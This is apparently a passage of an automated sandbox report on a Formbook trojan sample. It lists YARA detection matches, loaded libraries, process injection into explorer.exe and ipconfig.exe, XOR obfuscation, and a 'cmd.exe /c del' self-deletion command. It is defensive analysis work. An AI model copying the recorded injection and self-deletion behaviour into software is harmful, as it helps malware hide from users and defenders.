          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D056307_2_02D05630
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7F7B07_2_02D7F7B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CB14607_2_02CB1460
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7F43F7_2_02D7F43F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D895C37_2_02D895C3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D5D5B07_2_02D5D5B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D775717_2_02D77571
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D6DAC67_2_02D6DAC6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D05AA07_2_02D05AA0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D61AA37_2_02D61AA3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D5DAAC7_2_02D5DAAC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D77A467_2_02D77A46
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7FA497_2_02D7FA49
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D33A6C7_2_02D33A6C
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D35BF07_2_02D35BF0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CFDBF97_2_02CFDBF9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CDFB807_2_02CDFB80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7FB767_2_02D7FB76
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC38E07_2_02CC38E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D2D8007_2_02D2D800
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC99507_2_02CC9950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CDB9507_2_02CDB950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D559107_2_02D55910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC9EB07_2_02CC9EB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02C83FD27_2_02C83FD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02C83FD57_2_02C83FD5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC1F927_2_02CC1F92
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7FFB17_2_02D7FFB1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7FF097_2_02D7FF09
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D7FCF27_2_02D7FCF2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D39C327_2_02D39C32
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CDFDC07_2_02CDFDC0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02CC3D407_2_02CC3D40
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D71D5A7_2_02D71D5A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_02D77D737_2_02D77D73
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EE1E57_2_001EE1E5
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EE2667_2_001EE266
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EE5B47_2_001EE5B4
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001ED5A37_2_001ED5A3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EDAE67_2_001EDAE6
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EDB927_2_001EDB92
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001D2D907_2_001D2D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EDD877_2_001EDD87
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001D9E607_2_001D9E60
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001EDEB97_2_001EDEB9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_001D2FB07_2_001D2FB0
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: String function: 017AF290 appears 105 times
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: String function: 01777E54 appears 101 times
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: String function: 0179EA12 appears 86 times
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: String function: 0171B970 appears 280 times
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeCode function: String function: 01765130 appears 58 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02CAB970 appears 280 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02D07E54 appears 110 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02D3F290 appears 105 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02CF5130 appears 58 times
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02D2EA12 appears 86 times
          Source: hj3YCvtlg7.exeStatic PE information: invalid certificate
          Source: hj3YCvtlg7.exeBinary or memory string: OriginalFilename vs hj3YCvtlg7.exe
          Source: hj3YCvtlg7.exe, 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hj3YCvtlg7.exe
          Source: hj3YCvtlg7.exe, 00000000.00000002.1353495106.00000000010FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hj3YCvtlg7.exe
          Source: hj3YCvtlg7.exe, 00000000.00000002.1356812219.00000000072D0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs hj3YCvtlg7.exe
          Source: hj3YCvtlg7.exe, 00000005.00000002.1405518091.000000000181D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs hj3YCvtlg7.exe
          Source: hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001277000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs hj3YCvtlg7.exe
          Source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs hj3YCvtlg7.exe
          Source: hj3YCvtlg7.exeBinary or memory string: OriginalFilenameUuoN.exeX vs hj3YCvtlg7.exe
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: dwrite.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeSection loaded: windowscodecs.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
          Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: wininet.dllJump to behavior
          Source: hj3YCvtlg7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Process Memory Space: hj3YCvtlg7.exe PID: 7652, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: hj3YCvtlg7.exe PID: 7832, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: ipconfig.exe PID: 7884, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: hj3YCvtlg7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, M4cKctOuk68Oc7Rd9m.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, M4cKctOuk68Oc7Rd9m.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.hj3YCvtlg7.exe.3fc1d80.6.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, M4cKctOuk68Oc7Rd9m.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, M4cKctOuk68Oc7Rd9m.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, M4cKctOuk68Oc7Rd9m.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
          Source: 0.2.hj3YCvtlg7.exe.72d0000.9.raw.unpack, M4cKctOuk68Oc7Rd9m.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: _0020.SetAccessControl
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
          Source: 0.2.hj3YCvtlg7.exe.3f51d60.5.raw.unpack, VrMKeGIZlmivmEjgSP.csSecurity API names: _0020.AddAccessRule
          Source: 0.2.hj3YCvtlg7.exe.2c7fefc.3.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.hj3YCvtlg7.exe.7000000.8.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: 0.2.hj3YCvtlg7.exe.2c4f170.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
          Source: classification engineClassification label: mal100.troj.evad.winEXE@12/1@11/6
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\hj3YCvtlg7.exe.logJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7976:120:WilError_03
          Source: hj3YCvtlg7.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: hj3YCvtlg7.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
          Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: hj3YCvtlg7.exeReversingLabs: Detection: 68%
          Source: hj3YCvtlg7.exeVirustotal: Detection: 71%
          Source: unknownProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeProcess created: C:\Users\user\Desktop\hj3YCvtlg7.exe "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\hj3YCvtlg7.exe"Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\hj3YCvtlg7.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: hj3YCvtlg7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: hj3YCvtlg7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: hj3YCvtlg7.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: ipconfig.pdb source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ipconfig.pdbGCTL source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: UuoN.pdbSHA256 source: hj3YCvtlg7.exe
          Source: Binary string: wntdll.pdbUGP source: hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: hj3YCvtlg7.exe, hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: UuoN.pdb source: hj3YCvtlg7.exe

          Data Obfuscation

          barindex
          Source: hj3YCvtlg7.exe, Form9.cs.Net Code: InitializeComponent contains xor as well as GetObject
